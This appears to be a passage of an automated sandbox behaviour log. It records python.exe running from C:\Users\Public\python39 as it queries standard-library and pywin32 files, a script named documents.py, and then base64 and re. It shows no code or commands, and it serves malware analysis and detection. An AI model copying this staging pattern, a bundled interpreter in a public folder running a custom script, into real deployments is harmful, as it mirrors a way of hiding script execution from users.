Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\python39.zip VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\python39.zip VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\DLLs VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\DLLs VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\DLLs VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\encodings\__init__.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\encodings\__init__.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\encodings\__pycache__\__init__.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\encodings\__pycache__\__init__.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\encodings\__init__.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\encodings\__init__.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\encodings\__init__.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\encodings\__pycache__ VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\encodings\__pycache__\__init__.cpython-39.pyc.1294156707376 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\DLLs VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\codecs.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\codecs.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\codecs.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\codecs.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\codecs.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\codecs.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\codecs.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\codecs.cpython-39.pyc.1294156785792 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\encodings VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\encodings VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\encodings VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\encodings\aliases.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\encodings\aliases.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\encodings\__pycache__\aliases.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\encodings\__pycache__\aliases.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\encodings\aliases.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\encodings\aliases.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\encodings\aliases.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\encodings\__pycache__ VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\encodings\__pycache__\aliases.cpython-39.pyc.1294156709424 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\encodings VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\encodings\utf_8.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\encodings\utf_8.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\encodings\__pycache__\utf_8.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\encodings\__pycache__\utf_8.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\encodings\utf_8.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\encodings\utf_8.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\encodings\utf_8.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\encodings\__pycache__ VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\encodings\__pycache__\utf_8.cpython-39.pyc.1294156709040 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\encodings VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\encodings\cp1252.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\encodings\cp1252.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\encodings\__pycache__\cp1252.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\encodings\__pycache__\cp1252.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\encodings\cp1252.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\encodings\cp1252.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\encodings\cp1252.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\encodings\__pycache__ VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\encodings\__pycache__\cp1252.cpython-39.pyc.1294156709296 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\encodings VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\encodings\latin_1.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\encodings\latin_1.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\encodings\__pycache__\latin_1.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\encodings\__pycache__\latin_1.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\encodings\latin_1.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\encodings\latin_1.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\encodings\latin_1.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\encodings\__pycache__ VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\encodings\__pycache__\latin_1.cpython-39.pyc.1294156708912 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\DLLs VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\io.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\io.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\io.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\io.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\io.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\io.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\io.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\io.cpython-39.pyc.1294156786800 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\DLLs VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\abc.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\abc.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\abc.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\abc.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\abc.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\abc.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\abc.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\abc.cpython-39.pyc.1294156787360 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\DLLs VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\site.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\site.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\site.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\site.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\site.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\site.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\site.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\site.cpython-39.pyc.1294158333408 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\DLLs VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\os.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\os.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\os.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\os.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\os.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\os.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\os.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\os.cpython-39.pyc.1294158333520 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\DLLs VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\stat.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\stat.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\stat.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\stat.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\stat.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\stat.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\stat.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\stat.cpython-39.pyc.1294159633968 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\DLLs VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\_collections_abc.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\_collections_abc.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\_collections_abc.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\_collections_abc.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\_collections_abc.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\_collections_abc.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\_collections_abc.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\_collections_abc.cpython-39.pyc.1294158280240 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\DLLs VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\ntpath.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\ntpath.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\ntpath.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\ntpath.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\ntpath.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\ntpath.cpython-39.pyc.1294161877344 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\DLLs VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\genericpath.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\genericpath.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\genericpath.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\genericpath.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\genericpath.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\genericpath.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\genericpath.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\genericpath.cpython-39.pyc.1294162033712 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\DLLs VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\_sitebuiltins.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\_sitebuiltins.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\_sitebuiltins.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\_sitebuiltins.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\_sitebuiltins.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\_sitebuiltins.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\_sitebuiltins.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\_sitebuiltins.cpython-39.pyc.1294162033712 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\site-packages VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\site-packages\distutils-precedence.pth VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\DLLs VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\_bootlocale.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\_bootlocale.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\_bootlocale.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\_bootlocale.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\_bootlocale.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\_bootlocale.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\_bootlocale.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\_bootlocale.cpython-39.pyc.1294161957680 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\site-packages\pywin32.pth VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\site-packages\win32 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\site-packages\win32\lib VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\site-packages\pythonwin VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\DLLs VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\site-packages VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\site-packages VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\site-packages VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\site-packages\win32 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\site-packages\win32 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\site-packages\win32\lib VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\site-packages\win32\lib VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\site-packages\win32\lib VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\site-packages\win32\lib\pywin32_bootstrap.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\site-packages\win32\lib\pywin32_bootstrap.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\site-packages\win32\lib\__pycache__\pywin32_bootstrap.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\site-packages\win32\lib\__pycache__\pywin32_bootstrap.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\site-packages\win32\lib\pywin32_bootstrap.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\site-packages\win32\lib\pywin32_bootstrap.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\site-packages\win32\lib\pywin32_bootstrap.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\site-packages\win32\lib\__pycache__ VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\site-packages\win32\lib\__pycache__\pywin32_bootstrap.cpython-39.pyc.1294161983248 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\DLLs VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\site-packages VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\site-packages\pywin32_system32 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\site-packages\win32\lib VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\site-packages\pythonwin VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\site-packages\pythonwin VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\site-packages\pythonwin VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\site-packages\pywin32_system32 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\DLLs VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\site-packages VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\site-packages\win32\lib VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\DLLs VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\site-packages VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\site-packages\win32 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\site-packages\win32\lib VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\documents.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\documents.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\documents.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\documents.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\documents.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\DLLs VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\base64.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\base64.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\base64.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\base64.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\base64.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\base64.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\base64.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\base64.cpython-39.pyc.1294161876896 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\DLLs VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\re.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\re.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\re.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\re.cpython-39.pyc VolumeInformation
